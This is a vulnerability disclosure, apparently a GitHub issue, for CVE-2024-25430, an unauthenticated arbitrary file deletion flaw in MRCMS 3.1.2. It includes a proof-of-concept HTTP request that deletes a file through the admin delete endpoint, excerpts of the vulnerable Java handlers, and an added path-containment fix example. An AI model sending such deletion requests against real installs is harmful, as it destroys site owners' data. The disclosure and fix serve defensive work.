Open xia0chensec opened 7 months ago
[The name of an affected Product]
MRCMS
[The affected or fixed version]
v3.1.2
[CVE ID] CVE-2024-25430
[Vulnerability Type]
Arbitrary file deletion vulnerability
[Vulnerability Description]
An arbitrary file deletion vulnerability exists in MRCMS 3.1.2.
[Vulnerability details]
The vulnerability exists at: http://localhost:8080/admin/file/delete.do?path=/&name=
1. Select content -> File management
2. Click the delete button
Try deleting the test.txt file
POC
    GET /admin/file/delete.do?path=/&name=test.txt HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Content-Length: 0
code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
    @ResponseBody
    @RequestMapping("/delete")
    public Object delete(@RequestParam("path") String path, @RequestParam("name") String name){
        if(fileManager.checkPath(path)){
            return new ResultMessage(false, "路径检查异常,删除失败!");
        }
        File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
        return fileManager.delete(file);
    }
The code takes the path and name variables as request parameters: path specifies the path, and name specifies the file/directory name.
Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
Users can delete arbitrary files without authorization because authentication is not used before file deletion.
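    public boolean deleteFolder(File delFolder) {
        // Check whether the directory or file exists
        if (!delFolder.exists()) {
            // Return false if it does not exist
            return false;
        } else {
            // Check whether it is a file
            if (delFolder.isFile()) {
                // For a file, call the file deletion method
                return deleteFile(delFolder);
            } else {
                // For a directory, call the directory deletion method
                return deleteDirectory(delFolder);
            }
        }
    }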
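An added example (not MRCMS code and not from the report): a containment check for the path and name parameters of the delete handler, assuming deletions are meant to stay under the web root. The class and method names are hypothetical, webRoot stands in for WebRealPathHolder.REAL_PATH, and the missing authentication the report describes has to be fixed separately.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class SafeDeleteDemo {

    // Hypothetical helper: resolve path + name under webRoot and refuse any
    // result that is the root itself or lies outside it.
    static Path resolveInsideRoot(Path webRoot, String path, String name) throws IOException {
        Path root = webRoot.toRealPath();
        // Treat the request values as relative to the root, whatever separators they use.
        String rel = (path + "/" + name).replace('\\', '/').replaceAll("^/+", "");
        Path target = root.resolve(rel).normalize();
        if (!target.startsWith(root) || target.equals(root)) {
            throw new SecurityException("not inside web root: '" + rel + "'");
        }
        // For existing targets, follow symlinks and check the real location too.
        if (Files.exists(target) && !target.toRealPath().startsWith(root)) {
            throw new SecurityException("link leaves web root: '" + rel + "'");
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample root and file; nothing here touches a real MRCMS install.
        Path root = Files.createTempDirectory("webroot").toRealPath();
        Files.createFile(root.resolve("test.txt"));

        // Constructed request values: the report's path=/&name=test.txt,
        // an empty name (resolves to the root itself), and a parent reference.
        String[][] requests = { {"/", "test.txt"}, {"/", ""}, {"/", "../outside.txt"} };
        for (String[] r : requests) {
            try {
                Path target = resolveInsideRoot(root, r[0], r[1]);
                boolean deleted = Files.deleteIfExists(target);
                System.out.println("allowed:  " + root.relativize(target) + " deleted=" + deleted);
            } catch (SecurityException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
        Files.deleteIfExists(root);
    }
}
```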